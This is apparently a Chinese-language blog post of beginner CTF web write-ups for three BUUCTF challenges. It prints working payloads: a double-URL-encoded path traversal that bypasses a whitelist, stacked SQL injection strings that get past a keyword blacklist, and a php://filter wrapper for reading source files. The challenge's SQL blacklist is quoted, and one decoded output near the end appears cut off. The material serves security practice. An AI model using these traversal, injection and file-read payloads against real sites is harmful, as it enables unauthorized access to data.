从零开始的CTFer成长之路–Web篇

本篇记录CTF中Web题WriteUp，适合入门新手但不适用于零基础，推荐使用右下角目录浏览

2021-5-12

[HCTF 2018]WarmUp - 出自BUUCTF

打开页面发现有张图片 我们直接查看源码分析

可以看到存在页面: source.php 访问可以直接看到源代码 其中

if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
)


定义了三个条件

1.不允许为空
2.必须为字符串
3.通过checkFile()函数校验


接下来分析checkFile()函数：

class emmm //定义emmm类
{
public static function checkFile(&$page) #//将传入的参数给$page
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"]; //声明变量$whitelist数组
if (! isset($page) || !is_string($page)) { //若$page值为空或者$page不是字符串
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) { //若$page值存在于$whitelist数组中
return true;
}
$_page = mb_substr( //截取$page字符串?前面的部分,若无则截取整段$page
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page); //url解码$page
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}


$whitelist = ["source"=>"source.php","hint"=>"hint.php"] 定义了hint的参数只能为source.php或hint.php

我们在source.php后面跟上?file=hint.php 页面返回结果

flag not here, and flag in ffffllllaaaagggg


可以知道flag文件的文件名为ffffllllaaaagggg

其中 urldecode()对$page进行了解码后再次截取了?前的内容并且赋值给$_page

$_page = urldecode($page); //url解码$page
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);


我们可以通过这个函数绕过白名单检测，将?编码两次后的结果%253F作为参数拼接出payload

http://5bc874fd-f511-4f3f-91eb-6fac30058d51.node3.buuoj.cn/source.php?file=hint.php%253F../../../../../ffffllllaaaagggg


FLAG : flag{34643d71-22e7-4c62-bcd1-8245dc2e813a}

2021-5-21

[SUCTF 2019]EasySQL - 出自BUUCTF

我们首先进入页面 对注入点进行测试 输入数字页面回显数组



尝试输入字符串页面没有回显



输入注入语句页面返回Nonono.



尝试堆叠注入 构建语句查询数据库

1;show databases;


同理构建语句查询当前使用的库下的所有的表

1;show tables;


尝试使用show columns查看flag表内的数据

1;show columns from Flag;#


发现from被屏蔽了 页面返回Nonono.

多次尝试无果 在writeup内找到网页源代码

session_start();
include_once "config.php";
$post = array();
$get = array();
global $MysqlLink;
//GetPara();
$MysqlLink = mysqli_connect("localhost",$datauser,$datapass);
if(!$MysqlLink){
die("Mysql Connect Error!");
}
$selectDB = mysqli_select_db($MysqlLink,$dataName);
if(!$selectDB){
die("Choose Database Error!");
}
foreach ($_POST as $k=>$v){
if(!empty($v)&&is_string($v)){
$post[$k] = trim(addslashes($v));
}
}
foreach ($_GET as $k=>$v){
}
}
//die();
?>




Give me your flag, I will tell you if the flag is right.






if(isset($post['query'])){
$BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile
|readfile|where|from|union|update|delete|if|sleep|extractvalue|
updatexml|or|and|&|\"";
//var_dump(preg_match("/{$BlackList}/is",$post['query']));
if(preg_match("/{$BlackList}/is",$post['query'])){
//echo $post['query'];
die("Nonono.");
}
if(strlen($post['query'])>40){
die("Too long.");
}
$sql = "select ".$post['query']."||flag from Flag";
mysqli_multi_query($MysqlLink,$sql);
do{
if($res = mysqli_store_result($MysqlLink)){
while($row = mysqli_fetch_row($res)){
print_r($row);
}
}
}while(@mysqli_next_result($MysqlLink));
}

?>


我们找到注入点的语句

select ".$post['query']."||flag from Flag


语句会创建query传来参数的字段与结果一起查询





构建语句 查询表中所有结果 在网页中返回flag值

select *,1||flag from Flag


flag{d6a4e191-b241-44b2-8132-b4bbf9968a52}

[ACTF2020 新生赛]Include - 出自BUUCTF

打开页面点击tips看到URL对flag.php页面进行了包含



进行多次尝试包含上级目录的是否存在flag文件无果转换思路 通过php伪协议查看当前页面源码 构建语句

file=php://filter/read=convert.base64-encode/resource=flag.php


网页返回base64加密后的源码



解码后发现网页源代码内就存在flag

>>> import base64
>>> str ="PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YTNmNGY0YjUtNTdkMy00ZDViLWEzMTQtMzQ1ZTIxODU1MmFhfQo="
>>> base64.b64decode(str)
b'>>>


flag{a3f4f4b5-57d3-4d5b-a314-345e218552aa}